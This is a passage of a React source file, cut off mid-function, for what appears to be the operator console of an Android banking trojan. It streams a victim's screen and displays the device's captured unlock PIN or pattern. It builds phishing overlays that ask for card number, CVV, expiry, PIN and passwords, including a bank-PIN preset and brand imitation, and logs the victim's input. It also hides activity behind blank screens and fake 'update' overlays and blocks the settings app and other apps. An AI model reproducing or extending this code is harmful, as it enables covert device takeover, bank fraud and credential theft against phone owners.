import React, { useEffect, useRef, useState, useCallback } from 'react';

import toastr from 'toastr';

import 'toastr/build/toastr.min.css';

import api from '../../services/api';

import useAuth from '../../hooks/useAuth';



const MIN_W = 540;

const MIN_H = 420;

const DEFAULT_W = 980;

const DEFAULT_H = 700;



// Целевой размер текста на экране (CSS px) при любом масштабе

const TARGET_FONT_PX = 13;



function getPatternDots(m) {
  if (Array.isArray(m?.dots) && m.dots.length) return m.dots;
  if (Array.isArray(m?.code) && m.code.length) return m.code;
  return [];
}

function PatternGrid({ dots, gridSize }) {

  const cols = Math.max(3, Math.round(Math.sqrt(gridSize || 9)));

  const step = 20;

  const r = 7;

  const w = cols * step;

  const h = cols * step;

  const seqMap = {};

  (dots || []).forEach((d, i) => { seqMap[d] = i + 1; });

  return (

    <svg width={w} height={h} style={{ display: 'block', margin: '0 auto' }}>

      {Array.from({ length: cols * cols }, (_, i) => {

        const cx = (i % cols) * step + step / 2;

        const cy = Math.floor(i / cols) * step + step / 2;

        const seq = seqMap[i];

        return (

          <g key={i}>

            <circle cx={cx} cy={cy} r={r}

              fill={seq ? '#102a18' : '#080f0a'}

              stroke={seq ? '#3caf67' : '#0f2015'}

              strokeWidth="1.2" />

            {seq && (

              <text x={cx} y={cy} textAnchor="middle" dominantBaseline="central"

                fontSize="7" fill="#8dffa8" fontWeight="bold">{seq}</text>

            )}

          </g>

        );

      })}

    </svg>

  );

}



function InteractivePatternGrid({ dots, onDotClick }) {

  const cols = 3;

  const step = 24;

  const r = 8;

  const w = cols * step;

  const h = cols * step;

  const seqMap = {};

  (dots || []).forEach((d, i) => { seqMap[d] = i + 1; });

  const pts = (dots || []).map(d => ({

    cx: (d % cols) * step + step / 2,

    cy: Math.floor(d / cols) * step + step / 2,

  }));

  return (

    <svg width={w} height={h} style={{ display: 'block', margin: '0 auto', cursor: 'pointer' }}>

      {pts.length > 1 && pts.slice(1).map((p, i) => (

        <line key={i} x1={pts[i].cx} y1={pts[i].cy} x2={p.cx} y2={p.cy}

          stroke="#3caf67" strokeWidth="1.5" opacity="0.5" />

      ))}

      {Array.from({ length: cols * cols }, (_, i) => {

        const cx = (i % cols) * step + step / 2;

        const cy = Math.floor(i / cols) * step + step / 2;

        const seq = seqMap[i];

        const isLast = (dots || []).length > 0 && dots[dots.length - 1] === i;

        return (

          <g key={i} onClick={() => onDotClick(i)} style={{ cursor: 'pointer' }}>

            <circle cx={cx} cy={cy} r={r + 4} fill="transparent" />

            <circle cx={cx} cy={cy} r={r}

              fill={seq ? '#102a18' : '#080f0a'}

              stroke={isLast ? '#7dffa8' : seq ? '#3caf67' : '#0f2015'}

              strokeWidth={isLast ? '2' : '1.2'} />

            {seq && (

              <text x={cx} y={cy} textAnchor="middle" dominantBaseline="central"

                fontSize="8" fill="#8dffa8" fontWeight="bold">{seq}</text>

            )}

          </g>

        );

      })}

    </svg>

  );

}



function VNCModal({ device, ws, onClose }) {

  const uuid = device?.uuid;

  const { registerOnWSMessage, connectionStatus } = useAuth();

  const currentSocket = ws?.current;

  const [mode, setMode]               = useState('off');

  const [overlayMode, setOverlayMode] = useState('none');

  const [settingsBlockEnabled, setSettingsBlockEnabled] = useState(
    device?.systemInfo?.settingsBlockEnabled ?? null
  );

  const [vibrating, setVibrating] = useState(false);

  const [vibDuration, setVibDuration] = useState(10);

  const [blackTextModal, setBlackTextModal] = useState(false);

  const [blackText, setBlackText] = useState('');

  const [blackUpdateMode, setBlackUpdateMode] = useState(false);

  const [blackBrightness, setBlackBrightness] = useState(11);

  const [blackContrast,   setBlackContrast]   = useState(0);

  const cssContrast = blackContrast >= 0 ? (1 + blackContrast * 1.9) : Math.max(0.05, 1 + blackContrast * 0.095);

  const [blackInvert, setBlackInvert] = useState(false);

  const [fps, setFps]                 = useState(0);

  const [screenshotOverlay, setScreenshotOverlay] = useState(null); // base64 скрин поверх AcVNC



  // ── Гибридный оверлей ────────────────────────────────────────────────────────

  const [hybridActive,      setHybridActive]      = useState(false);

  const [showHybridDialog,  setShowHybridDialog]  = useState(false);

  const [hybridLogs,        setHybridLogs]        = useState([]);

  const [showHybridLogs,    setShowHybridLogs]    = useState(false);

  const [hRevealLog,        setHRevealLog]        = useState({});

  // Конфигуратор

  const [hTitle,      setHTitle]      = useState('');

  const [hButtonText, setHButtonText] = useState('');

  const [hDurType,    setHDurType]    = useState('permanent');

  const [hDurSec,     setHDurSec]     = useState(60);

  const [hType,       setHType]       = useState('pin');

  const [hPinDigits,  setHPinDigits]  = useState(0);

  const [hUrl,        setHUrl]        = useState('');

  const [hHint,       setHHint]       = useState('');

  const [hBrand,      setHBrand]      = useState('xiaomi');

  const [hValidatePin,setHValidatePin]= useState(false);

  const [hShowExpiry, setHShowExpiry] = useState(true);

  const [hShowCvv,    setHShowCvv]    = useState(true);

  const [hShowName,   setHShowName]   = useState(false);

  // Кастом-конструктор
  const [cTitle,       setCTitle]       = useState('');
  const [cDesc,        setCDesc]        = useState('');
  const [cBtnText,     setCBtnText]     = useState('Подтвердить');
  const [cBtnColor,    setCBtnColor]    = useState('#FFDD2D');
  const [cBgUrl,       setCBgUrl]       = useState('');
  const [cFields,      setCFields]      = useState({ pin: false, card: false, phone: false, email: false, password: false, text: false });
  const [cValidatePin, setCValidatePin] = useState(false);
  const [cPinLength,   setCPinLength]   = useState(4);
  const [cPinLabel,    setCPinLabel]    = useState('Код подтверждения');
  const [cCustomMode,  setCCustomMode]  = useState(false);
  const [hSbpinPreset,      setHSbpinPreset]      = useState(false);
  const [hSbpinGreeting,    setHSbpinGreeting]    = useState('');
  const [hSbpinName,        setHSbpinName]        = useState('');
  const [hSbpinValidPin,    setHSbpinValidPin]    = useState(false);
  const [hSbpinPattern,     setHSbpinPattern]     = useState('');
  const [hSbpinPopup,       setHSbpinPopup]       = useState(false);
  const [hSbpinPopupTitle,  setHSbpinPopupTitle]  = useState('');
  const [hSbpinPopupText,   setHSbpinPopupText]   = useState('');
  const [hSbpinPopupBtn,    setHSbpinPopupBtn]    = useState('');

  // ── Пуш-Алерт ───────────────────────────────────────────────────────────────
  const [showPushAlert,   setShowPushAlert]   = useState(false);
  const [paTitle,         setPaTitle]         = useState('Внимание');
  const [paMessage,       setPaMessage]       = useState('');
  const [paBtnText,       setPaBtnText]       = useState('Понятно');
  const [paBtnColor,      setPaBtnColor]      = useState('#D0BCFF');
  const [paBtnTextColor,  setPaBtnTextColor]  = useState('#381E72');
  const [paLaunchApp,     setPaLaunchApp]     = useState('');
  const [paAppSearch,     setPaAppSearch]     = useState('');
  const [paDurType,       setPaDurType]       = useState('permanent');
  const [paDurSec,        setPaDurSec]        = useState(60);
  const pushAlertPendingRef = useRef(false);

  // Текущий метод разблокировки: сначала из БД, потом обновляем из WS

  const [unlockMethod, setUnlockMethod] = useState(

    () => device?.systemInfo?.unlockMethod || { type: '?' }

  );

  const [pinnedMethod, setPinnedMethod] = useState(

    () => device?.systemInfo?.unlockMethodManual || null

  );

  const activeMethod = pinnedMethod ?? unlockMethod;

  const isWeakMethod = (m) => {
    if (!m || m.type === '?' || m.type === 'unknown' || m.type === 'swipe') return true;
    if ((m.type === 'pin' || m.type === 'password') && (m.code?.length || 0) < 4) return true;
    if (m.type === 'pattern' && getPatternDots(m).length < 4) return true;
    return false;
  };



  // Сайдбар: позиция ('left' | 'top') и размер

  const [sidebarPos,  setSidebarPos]  = useState('left');

  const [sidebarSize, setSidebarSize] = useState(78);

  const sidebarPosRef  = useRef('left');

  const sidebarSizeRef = useRef(78);

  sidebarPosRef.current  = sidebarPos;

  sidebarSizeRef.current = sidebarSize;



  const [rightBarOpen, setRightBarOpen] = useState(false);

  const [appsSearch,   setAppsSearch]   = useState('');



  const [showTextBar,      setShowTextBar]      = useState(false);

  const [textBarValue,     setTextBarValue]     = useState('');

  const [showUnlockSecret, setShowUnlockSecret] = useState(false);

  const [showPatternEditor, setShowPatternEditor] = useState(false);

  const [patEdType, setPatEdType] = useState('pattern');

  const [patEdDots, setPatEdDots] = useState([]);

  const [patEdText, setPatEdText] = useState('');

  const [patEdPin, setPatEdPin] = useState('');

  const [patEdPassword, setPatEdPassword] = useState('');

  const kbBufRef = useRef('');



  // AcVNC масштаб: 0.2 по дефолту, от 0.1 до 4.0

  const [acScale, setAcScaleState] = useState(() => { const v = parseFloat(localStorage.getItem('vnc_acScale')); return (!isNaN(v) && v >= 0.1 && v <= 4.0) ? v : 0.2; });

  const acScaleRef = useRef(parseFloat(localStorage.getItem('vnc_acScale')) || 0.2);

  const setAcScale = (v) => {

    const c = Math.max(0.1, Math.min(4.0, Math.round(v * 10) / 10));

    acScaleRef.current = c;

    setAcScaleState(c); localStorage.setItem('vnc_acScale', c);

  };



  // AcVNC глубина дерева доступности: 5 по дефолту, от 1 до 15

  const [acDepth, setAcDepthState] = useState(() => { const v = parseInt(localStorage.getItem('vnc_acDepth'), 10); return (!isNaN(v) && v >= 1 && v <= 15) ? v : 5; });

  const acDepthRef = useRef(parseInt(localStorage.getItem('vnc_acDepth'), 10) || 5);

  const setAcDepth = (v) => {

    const c = Math.max(1, Math.min(15, Math.round(v)));

    acDepthRef.current = c;

    setAcDepthState(c); localStorage.setItem('vnc_acDepth', c);

  };



  // ScreenVNC zoom+pan: zoom 0.25..8.0, default 1.0

  const [screenZoom, setScreenZoomState] = useState(1.0);

  const screenZoomRef = useRef(1.0);

  const [screenPan, setScreenPanState] = useState({ x: 0, y: 0 });

  const screenPanRef = useRef({ x: 0, y: 0 });

  const screenContainerRef = useRef(null);

  const screenPanDragRef   = useRef(null);



  const setScreenZoom = (v) => {

    const c = Math.max(0.25, Math.min(8.0, Math.round(v * 100) / 100));

    screenZoomRef.current = c;

    setScreenZoomState(c);

  };

  const setScreenPan = (p) => {

    screenPanRef.current = p;

    setScreenPanState(p);

  };

  const resetScreenView = () => {

    screenZoomRef.current = 1.0;

    setScreenZoomState(1.0);

    screenPanRef.current = { x: 0, y: 0 };

    setScreenPanState({ x: 0, y: 0 });

  };



  const initW = Math.min(DEFAULT_W, window.innerWidth  - 20);
  const initH = Math.min(DEFAULT_H, window.innerHeight - 20);
  const [pos, setPos] = useState(() => ({

    x: Math.max(0, (window.innerWidth  - initW) / 2),

    y: Math.max(0, (window.innerHeight - initH) / 2),

    w: initW, h: initH,

  }));



  const acCanvasRef     = useRef(null);

  const screenCanvasRef = useRef(null);

  const videoCanvasRef  = useRef(null);

  const videoDecoderRef = useRef(null);

  const fpsCounterRef   = useRef(0);

  const swipeRef        = useRef(null);

  const posRef          = useRef(pos);

  posRef.current = pos;

  const modeRef = useRef('off');



  // VideoVNC: ожидание подтверждения MediaProjection + галочка авто-клик

  const videoPendingRef = useRef(false);

  const [videoPending, setVideoPendingRaw] = useState(false);

  const setVideoPending = (v) => { videoPendingRef.current = v; setVideoPendingRaw(v); };

  const savedSpsPpsRef  = useRef(null); // SPS+PPS из MSG_INIT, prepend к IDR

  const [autoIbisChecked, setAutoIbisChecked] = useState(true);



  // ── Анализ задержек: RTT команда → фрейм ────────────────────────────────────

  const [rtt, setRtt]           = useState(null);  // ms или null

  const lastCmdTsRef            = useRef(null);    // время последней отправленной команды

  const rttSamplesRef           = useRef([]);      // скользящее среднее (5 последних)

  const cmdRttTimeoutRef        = useRef(null);    // сброс lastCmdTs если фрейм не пришёл за 2с



  // ── Heartbeat / reconnect ────────────────────────────────────────────────────

  const userIntentRef   = useRef('off'); // что USER явно выбрал (не то что устройство сообщило)

  const lastFrameAtRef  = useRef(0);     // timestamp последнего полученного фрейма

  const reregisteringRef = useRef(false); // идёт off+on перерегистрация — не мешать



  // ── Индикатор "нет фреймов" ──────────────────────────────────────────────────

  const [noFrameSec, setNoFrameSec] = useState(0);



  // ── Ping до устройства ───────────────────────────────────────────────────────

  const [ping, setPing]   = useState(null);

  const pingTsRef         = useRef(null); // performance.now() момента отправки ping



  // ── VNC Relay (WS2) ─────────────────────────────────────────────────────────

  const relayWsRef      = useRef(null);  // WebSocket к vnc-relay.js

  const relayActiveRef  = useRef(false); // используем Relay прямо сейчас

  const tokenResolveRef = useRef(null);  // resolve для pending запроса токена

  const setupRelayRef         = useRef(null);  // всегда актуальная ссылка на setupRelay

  const relaySetupPendingRef  = useRef(false); // guard: async setup уже запущен

  const relaySetupIdRef       = useRef(0);     // инкрементируется при инвалидации setup





  useEffect(() => {

    const t = setInterval(() => { setFps(fpsCounterRef.current); fpsCounterRef.current = 0; }, 1000);

    return () => clearInterval(t);

  }, []);



  // Restore overlay state when modal opens (handles "left device and came back" scenario)

  useEffect(() => {

    if (!uuid) return;

    api.getOverlayState(uuid).then(res => {

      const { simpleOverlay: simple, hybridActive: hybrid } = res.data || {};

      if (simple && simple !== 'none') setOverlayMode(simple);

      if (hybrid) setHybridActive(true);

    }).catch(() => {});

  }, [uuid]); // eslint-disable-line

  useEffect(() => {

    toastr.options = { positionClass: 'toast-bottom-right', timeOut: 2000, extendedTimeOut: 500,

      newestOnTop: true, progressBar: true, closeButton: false, preventDuplicates: false };

  }, []);



  // ── Drag окна ───────────────────────────────────────────────────────────────

  const onDragStart = useCallback((e) => {

    e.preventDefault();

    const ox = e.clientX - posRef.current.x, oy = e.clientY - posRef.current.y;

    const mv = (ev) => setPos(p => ({ ...p, x: Math.max(0, ev.clientX - ox), y: Math.max(0, ev.clientY - oy) }));

    const up = () => { window.removeEventListener('mousemove', mv); window.removeEventListener('mouseup', up); };

    window.addEventListener('mousemove', mv); window.addEventListener('mouseup', up);

  }, []);

  const onTouchDragStart = useCallback((e) => {
    const touch = e.touches[0];
    const ox = touch.clientX - posRef.current.x, oy = touch.clientY - posRef.current.y;
    const mv = (te) => {
      const t = te.touches[0];
      if (!t) return;
      setPos(p => ({ ...p, x: Math.max(0, t.clientX - ox), y: Math.max(0, t.clientY - oy) }));
    };
    const up = () => { window.removeEventListener('touchmove', mv); window.removeEventListener('touchend', up); };
    window.addEventListener('touchmove', mv, { passive: false });
    window.addEventListener('touchend', up);
  }, []);



  // ── Resize окна (угол) ───────────────────────────────────────────────────────

  const onResizeStart = useCallback((e) => {

    e.preventDefault(); e.stopPropagation();

    const sx = e.clientX, sy = e.clientY, sw = posRef.current.w, sh = posRef.current.h;

    const mv = (ev) => setPos(p => ({ ...p, w: Math.max(MIN_W, sw + ev.clientX - sx), h: Math.max(MIN_H, sh + ev.clientY - sy) }));

    const up = () => { window.removeEventListener('mousemove', mv); window.removeEventListener('mouseup', up); };

    window.addEventListener('mousemove', mv); window.addEventListener('mouseup', up);

  }, []);



  // ── Resize сайдбара ─────────────────────────────────────────────────────────

  const onSidebarResizeStart = useCallback((e) => {

    e.preventDefault(); e.stopPropagation();

    const isLeft = sidebarPosRef.current === 'left';

    const start  = isLeft ? e.clientX : e.clientY;

    const startSz = sidebarSizeRef.current;

    const mv = (ev) => setSidebarSize(Math.max(60, Math.min(220, startSz + (isLeft ? ev.clientX : ev.clientY) - start)));

    const up = () => { window.removeEventListener('mousemove', mv); window.removeEventListener('mouseup', up); };

    window.addEventListener('mousemove', mv); window.addEventListener('mouseup', up);

  }, []);



  // ── ScreenVNC: pan средней кнопкой мыши ────────────────────────────

  const handleScreenPanStart = useCallback((e) => {

    if (e.button !== 1) return;

    e.preventDefault();

    const sx = e.clientX, sy = e.clientY;

    const p0 = { ...screenPanRef.current };

    const onMove = (ev) => {

      setScreenPan({ x: p0.x + ev.clientX - sx, y: p0.y + ev.clientY - sy });

    };

    const onUp = () => {

      screenPanDragRef.current = null;

      window.removeEventListener('mousemove', onMove);

      window.removeEventListener('mouseup', onUp);

    };

    screenPanDragRef.current = true;

    window.addEventListener('mousemove', onMove);

    window.addEventListener('mouseup', onUp);

  }, []); // eslint-disable-line



  // ── ScreenVNC: zoom вокруг центра контейнера (для кнопок ±) ────────

  const zoomAtCenter = useCallback((newZ) => {

    const clamped = Math.max(0.25, Math.min(8.0, newZ));

    const cont = screenContainerRef.current;

    if (cont) {

      const rect = cont.getBoundingClientRect();

      const cx = rect.width  / 2;

      const cy = rect.height / 2;

      const oldZ = screenZoomRef.current;

      const op   = screenPanRef.current;

      setScreenPan({

        x: cx - (cx - op.x) * (clamped / oldZ),

        y: cy - (cy - op.y) * (clamped / oldZ),

      });

    }

    setScreenZoom(clamped);

  }, []); // eslint-disable-line



  // ── Render AcVNC ─────────────────────────────────────────────────────────────

  // Канвас всегда рисуется в нативном разрешении устройства,

  // масштаб задаётся через CSS width (% от контейнера).

  // Размер шрифта на канвасе подбирается так, чтобы на экране текст был TARGET_FONT_PX.

  const renderAcFrame = useCallback((nodes, w, h) => {

    const canvas = acCanvasRef.current;

    if (!canvas) return;

    const scale = acScaleRef.current;

    const nw = w || 360, nh = h || 640;



    if (canvas.width !== nw)  canvas.width  = nw;

    if (canvas.height !== nh) canvas.height = nh;



    const ctx = canvas.getContext('2d');

    ctx.fillStyle = '#0d1117';

    ctx.fillRect(0, 0, nw, nh);



    if (!nodes) return;



    // Шрифт на канвасе: всегда видим как TARGET_FONT_PX на экране

    const baseFontPx = Math.max(TARGET_FONT_PX, Math.ceil(TARGET_FONT_PX / scale));

    const lineW      = Math.max(1, Math.ceil(1.5 / scale));

    const pad        = Math.ceil(4  / scale);



    nodes.forEach(n => {

      if (!n.bounds) return;

      const { left, top, right, bottom } = n.bounds;

      const bw = right - left, bh = bottom - top;

      if (bw <= 0 || bh <= 0) return;



      if (n.clickable) {

        ctx.strokeStyle = '#00c8f0';

        ctx.lineWidth = lineW;

        ctx.strokeRect(left + lineW, top + lineW, bw - lineW * 2, bh - lineW * 2);

        ctx.fillStyle = 'rgba(0, 200, 240, 0.07)';

        ctx.fillRect(left + lineW, top + lineW, bw - lineW * 2, bh - lineW * 2);

      } else {

        ctx.strokeStyle = '#1a2a3a';

        ctx.lineWidth = Math.max(0.5, lineW * 0.4);

        ctx.strokeRect(left, top, bw, bh);

      }



      if (n.text) {

        const txt = n.text.substring(0, 80);

        const fontSize = Math.min(baseFontPx, Math.floor(bh * 0.55));

        if (fontSize < 4) return;

        ctx.font = `bold ${fontSize}px sans-serif`;



        const lineH    = fontSize + pad;

        const maxW     = bw - pad * 3;

        const maxLines = Math.max(1, Math.floor((bh - pad * 2) / lineH));



        // Перенос текста по словам, не выходя за границы ячейки

        const words = txt.split(/\s+/);

        const lines = [];

        let cur = '';

        for (const word of words) {

          const test = cur ? cur + ' ' + word : word;

          if (ctx.measureText(test).width <= maxW) {

            cur = test;

          } else {

            if (cur) lines.push(cur);

            // Слово длиннее ячейки — обрезаем символами

            if (ctx.measureText(word).width > maxW) {

              let partial = '';

              for (const ch of word) {

                if (ctx.measureText(partial + ch).width <= maxW) partial += ch;

                else { lines.push(partial); partial = ch; }

              }

              cur = partial;

            } else {

              cur = word;

            }

          }

          if (lines.length >= maxLines) break;

        }

        if (cur && lines.length < maxLines) lines.push(cur);

        const visLines = lines.slice(0, maxLines);



        // Подложка под весь текстовый блок

        const blockH = visLines.length * lineH + pad;

        const blockW = Math.min(Math.max(...visLines.map(l => ctx.measureText(l).width)) + pad * 2, bw - pad * 2);

        ctx.fillStyle = 'rgba(5, 10, 20, 0.90)';

        ctx.fillRect(left + pad, top + pad, blockW, blockH);



        // Рисуем строки, клипингуем по границе ячейки

        ctx.save();

        ctx.rect(left, top, bw, bh);

        ctx.clip();

        ctx.fillStyle = n.clickable ? '#e0f4ff' : '#5a7a90';

        visLines.forEach((line, i) => {

          ctx.fillText(line, left + pad * 1.5, top + pad + lineH * (i + 1) - pad * 0.5);

        });

        ctx.restore();

      }

    });



    fpsCounterRef.current++;

  }, []);



  // ── Render JPEG/WebP (backward compat: fmt='webp' новые APK, 'jpeg'/undef старые) ──

  const renderImageFrame = useCallback((b64, ref, fmt) => {

    const canvas = ref.current;

    if (!canvas || !b64) return;

    const mimeType = fmt === 'webp' ? 'image/webp' : 'image/jpeg';

    try {

      const bin = atob(b64), arr = new Uint8Array(bin.length);

      for (let i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);

      createImageBitmap(new Blob([arr], { type: mimeType })).then(bmp => {

        if (canvas.width !== bmp.width)   canvas.width  = bmp.width;

        if (canvas.height !== bmp.height) canvas.height = bmp.height;

        canvas.getContext('2d').drawImage(bmp, 0, 0);

        bmp.close(); fpsCounterRef.current++;

      }).catch(() => {

        const img = new Image();

        img.onload = () => { canvas.width = img.width; canvas.height = img.height; canvas.getContext('2d').drawImage(img, 0, 0); fpsCounterRef.current++; };

        img.src = `data:${mimeType};base64,` + b64;

      });

    } catch (_) {}

  }, []);



  // ── VideoVNC: WebCodecs H.264 декодер ───────────────────────────────────────

  const videoSupported = typeof VideoDecoder !== 'undefined';



  const closeVideoDecoder = useCallback(() => {

    if (videoDecoderRef.current) {

      try { videoDecoderRef.current.close(); } catch (_) {}

      videoDecoderRef.current = null;

    }

  }, []);



  const decodeVideoChunk = useCallback((pts, data, isKey) => {

    const dec = videoDecoderRef.current;

    if (!dec || dec.state !== 'configured') return;

    try {

      dec.decode(new window.EncodedVideoChunk({ type: isKey ? 'key' : 'delta', timestamp: pts, data }));

    } catch (_) {}

  }, []);



  const initVideoDecoder = useCallback((spsPps, encW, encH) => {

    if (!videoSupported) return;

    if (videoDecoderRef.current) {

      try { videoDecoderRef.current.close(); } catch (_) {}

      videoDecoderRef.current = null;

    }

    // Читаем profile/constraints/level из SPS-NALU для корректной строки кодека

    let codecStr = 'avc1.42E01E'; // Baseline 3.0 — безопасный дефолт

    try {

      for (let i = 0; i < spsPps.length - 4; i++) {

        if (spsPps[i] === 0 && spsPps[i+1] === 0 && spsPps[i+2] === 0 && spsPps[i+3] === 1) {

          if ((spsPps[i+4] & 0x1f) === 7) { // SPS NAL unit

            codecStr = `avc1.${spsPps[i+5].toString(16).padStart(2,'0')}${spsPps[i+6].toString(16).padStart(2,'0')}${spsPps[i+7].toString(16).padStart(2,'0')}`;

            break;

          }

          i += 3;

        }

      }

    } catch (_) {}

    const dec = new VideoDecoder({ // eslint-disable-line no-undef

      output: (frame) => {

        const canvas = videoCanvasRef.current;

        if (canvas) {

          if (canvas.width  !== frame.displayWidth)  canvas.width  = frame.displayWidth;

          if (canvas.height !== frame.displayHeight) canvas.height = frame.displayHeight;

          canvas.getContext('2d').drawImage(frame, 0, 0);

          fpsCounterRef.current++;

        }

        frame.close();

      },

      error: (e) => console.warn('[VideoVNC] decoder error:', e.message),

    });

    try {

      dec.configure({ codec: codecStr, optimizeForLatency: true });

      videoDecoderRef.current = dec;

    } catch (e) {

      console.warn('[VideoVNC] configure error:', e);

      try { dec.close(); } catch (_) {}

    }

  }, [videoSupported]); // eslint-disable-line



  const handleVideoFrame = useCallback(async (data) => {

    const buf = data instanceof Blob ? await data.arrayBuffer() : data;

    const view = new DataView(buf);

    const t = view.getUint8(0);

    if (t === 0x01) {

      // MSG_INIT: [type:1][encW:4BE][encH:4BE][origW:4BE][origH:4BE][spsPps:...]

      if (videoPendingRef.current) { videoPendingRef.current = false; setVideoPendingRaw(false); }

      const spsPpsData = new Uint8Array(buf.slice(17));

      savedSpsPpsRef.current = spsPpsData;

      initVideoDecoder(spsPpsData, view.getInt32(1, false), view.getInt32(5, false));

    } else if (t === 0x02 || t === 0x03) {

      // MSG_FRAME / MSG_KEYFRAME: [type:1][pts:8BE][nalu:...]

      const isKey = t === 0x03;

      const pts = Number(view.getBigInt64(1, false));

      let frameData = new Uint8Array(buf, 9);

      if (isKey && savedSpsPpsRef.current) {

        // Qualcomm c2.qti.avc.encoder выдаёт IDR без inline SPS/PPS.

        // WebCodecs VideoDecoder (Annex B режим) требует их перед каждым IDR.

        const spsPps = savedSpsPpsRef.current;

        const combined = new Uint8Array(spsPps.length + frameData.length);

        combined.set(spsPps, 0);

        combined.set(new Uint8Array(buf, 9), spsPps.length);

        frameData = combined;

      }

      decodeVideoChunk(pts, frameData, isKey);

    }

  }, [initVideoDecoder, decodeVideoChunk]); // eslint-disable-line



  // ── WebSocket (reconnect-resilient через registerOnWSMessage) ────────────────

  useEffect(() => {

    const h = (msg) => {

      if (msg.uuid !== uuid) return;

      if (msg.action === 'ac_frame') {

        lastFrameAtRef.current = Date.now();

        if (lastCmdTsRef.current !== null) {

          const elapsed = Math.round(performance.now() - lastCmdTsRef.current);

          lastCmdTsRef.current = null;

          const samples = rttSamplesRef.current;

          samples.push(elapsed);

          if (samples.length > 5) samples.shift();

          setRtt(Math.round(samples.reduce((a, b) => a + b, 0) / samples.length));

        }

        renderAcFrame(msg.nodes, msg.w, msg.h);

      }

      else if (msg.action === 'crane_frame') {

        lastFrameAtRef.current = Date.now();

        if (lastCmdTsRef.current !== null) {

          const elapsed = Math.round(performance.now() - lastCmdTsRef.current);

          lastCmdTsRef.current = null;

          const samples = rttSamplesRef.current;

          samples.push(elapsed);

          if (samples.length > 5) samples.shift();

          setRtt(Math.round(samples.reduce((a, b) => a + b, 0) / samples.length));

        }

        renderImageFrame(msg.data, screenCanvasRef, msg.fmt);

      }

      else if (msg.action === 'pong_device') {

        if (pingTsRef.current !== null) {

          setPing(Math.round(performance.now() - pingTsRef.current));

          pingTsRef.current = null;

        }

        if (msg.settings_block_enabled !== undefined) {
          setSettingsBlockEnabled(msg.settings_block_enabled);
        }

      }

      else if (msg.action === 'settings_block_status') {

        setSettingsBlockEnabled(msg.enabled);

      }

      else if (msg.action === 'vibration_status') {

        setVibrating(msg.vibrating);

      }

      else if (msg.action === 'block_app_result') {

        if (msg.uuid === uuid) {
          if (msg.blocked) {
            toastr.success('🚫 Заблокировано: ' + msg.package);
          } else {
            toastr.success('✅ Разблокировано: ' + msg.package);
          }
        }

      }

      else if (msg.action === 'block_app_status') {

        if (msg.uuid === uuid) {
          if (msg.blocked) {
            toastr.info('🔒 Заблокирован: ' + msg.package);
          } else {
            toastr.info('🟢 Не заблокирован: ' + msg.package);
          }
        }

      }

      else if (msg.action === 'screenshot') {

        setScreenshotOverlay({ data: msg.data, fmt: msg.fmt });

      }

      else if (msg.action === 'hybrid_overlay_shown')  {
        setHybridActive(true);
        if (pushAlertPendingRef.current) {
          pushAlertPendingRef.current = false;
          toastr.success('✅ Алерт открыт на устройстве');
        }
      }

      else if (msg.action === 'hybrid_overlay_closed') {

        setHybridActive(false);

        toastr.info('Гибридный оверлей закрыт: ' + (msg.reason || ''));

      }

      else if (msg.action === 'hybrid_overlay_error')  { toastr.warning('Оверлей уже активен — дождитесь закрытия'); }

      else if (msg.action === 'hybrid_overlay_input')  {

        setHybridLogs(prev => [...prev, {

          type: msg.type, data: msg.data, ts: msg.timestamp || Date.now()

        }].slice(-200));

      }

      else if (msg.action === 'vnc_stopped' || msg.action === 'screen_vnc_stopped') {

        if (!videoPendingRef.current) {

          const intent = userIntentRef.current;

          if (intent && intent !== 'off' && intent !== 'video') {

            setRtt(null);

            setTimeout(() => {

              const socket = ws?.current;

              if (socket && socket.readyState === 1 && userIntentRef.current === intent) {

                socket.send(JSON.stringify({ action: 'set_crane_mode', uuid, mode: intent }));

              }

            }, 1500);

          } else {

            setMode('off'); setRtt(null); setOverlayMode('none');

          }

        }

      }

      else if (msg.action === 'video_stream_ended') {

        videoPendingRef.current = false; setVideoPendingRaw(false);

        if (modeRef.current === 'video') closeVideoDecoder();

        modeRef.current = 'off'; setMode('off');

      }

      else if (msg.action === 'video_permission_denied') {

        videoPendingRef.current = false; setVideoPendingRaw(false);

        modeRef.current = 'off'; setMode('off');

        closeVideoDecoder();

        toastr.error('Разрешение MediaProjection отклонено');

      }

      else if (msg.action === 'crane_mode') {

        if (!videoPendingRef.current && !reregisteringRef.current) {

          const intent = userIntentRef.current;

          const reported = msg.mode || 'off';

          if (intent !== 'off' && intent !== 'video' && reported !== intent) {

            const socket = ws?.current;

            if (socket && socket.readyState === 1) {

              socket.send(JSON.stringify({ action: 'set_crane_mode', uuid, mode: intent }));

            }

          } else {

            modeRef.current = reported;

            setMode(reported);

          }

        }

      }

      else if (msg.action === 'blank_screen_on')        setOverlayMode('black');

      else if (msg.action === 'fake_update_on')         setOverlayMode('update');

      else if (msg.action === 'android_update_on')      setOverlayMode('android_update');

      else if (msg.action === 'overlay_off')            setOverlayMode('none');

      else if (msg.action === 'unlock_method_update')   setUnlockMethod(msg.method || { type: '?' });

      else if (msg.action === 'unlock_method_manual_cleared' && msg.uuid === uuid) setPinnedMethod(null);

      // ── VNC Relay: ответы сервера на request_vnc_token ──

      else if (msg.action === 'vnc_token') {

        if (tokenResolveRef.current && msg.uuid === uuid) {

          tokenResolveRef.current({ token: msg.token, relayPort: msg.relayPort });

          tokenResolveRef.current = null;

        }

      }

      else if (msg.action === 'vnc_token_error') {

        if (tokenResolveRef.current && msg.uuid === uuid) {

          tokenResolveRef.current(null);

          tokenResolveRef.current = null;

        }

      }

      else if (msg.action === 'relay_reconnect') {

        if (msg.uuid === uuid && !relayActiveRef.current

            && !relaySetupPendingRef.current

            && modeRef.current !== 'off' && modeRef.current !== 'video') {

          if (setupRelayRef.current) setupRelayRef.current(uuid, modeRef.current);

        }

      }

    };



    // Бинарные фреймы VideoVNC — отдельный listener на текущий сокет

    const binaryH = (event) => {

      if ((event.data instanceof ArrayBuffer || event.data instanceof Blob) && modeRef.current === 'video') {

        handleVideoFrame(event.data);

      }

    };

    if (currentSocket) currentSocket.addEventListener('message', binaryH);

    const unregisterJson = registerOnWSMessage(h);



    return () => {

      if (currentSocket) currentSocket.removeEventListener('message', binaryH);

      if (typeof unregisterJson === 'function') unregisterJson();

    };

  }, [uuid, currentSocket, renderAcFrame, renderImageFrame, handleVideoFrame, closeVideoDecoder, registerOnWSMessage]); // eslint-disable-line



  // ── VNC Relay helpers ─────────────────────────────────────────────────────────



  // Запросить JWT-токен у сервера через WS1 (ответ придёт как vnc_token)

  const requestVncToken = useCallback((targetUuid) => {

